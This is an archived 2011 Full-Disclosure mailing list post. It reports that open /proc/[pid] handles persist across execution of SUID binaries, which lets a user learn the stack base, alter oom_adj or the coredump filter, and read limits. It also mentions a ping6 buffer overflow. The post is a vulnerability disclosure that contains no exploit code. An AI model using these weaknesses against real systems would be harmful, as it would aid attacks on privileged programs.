lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 22 Jan 2011 07:39:22 +0000
From: halfdog <me@...fdog.net>
To: full-disclosure@...ts.grok.org.uk
Subject: Proc filesystem and SUID-Binaries

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In my reply to FD-post "GNU libc/regcomp(3) Multiple Vulnerabilities" I
indicated, that I found and reported the same bug while searching for
resource starvation bugs two years ago. So I dug out the programs from
back than to test suid binaries on recent linux distro and kernel. While
it is still possible to trigger quite a few different flaws, none of
them is quite interesting enough to investigate (mostly NULL and -1
derefs). But I got a minor but funny fault:

When executing a process as normal user, one can open /proc/[pid]/
entries and keep them open, even after executing a suid binary. Thus it
is possible e.g. to
* Find stack base even with stack randomization
* Modify oom_adj and kill the suid-binary with SIGKILL
* Modify the coredump filter
* Read limits

Damn it, that /proc/self/mem is not rw

See http://www.halfdog.net/Security/2011/SuidBinariesAndProcInterface/


Apart from that, ping6 contains a trivial buffer overflow using the size
parameter (>128000), but I think it is not exploitable to gain root
privileges.

See http://www.halfdog.net/Security/2011/Ping6BufferOverflow/

- -- 
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFNOom3xFmThv7tq+4RAjYgAKCC/jMjYGQXGGdaf0ThCxbX5Ru+rwCdGby2
AI+Av64ClCQSYLREKmcJM2w=
=VPrq
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ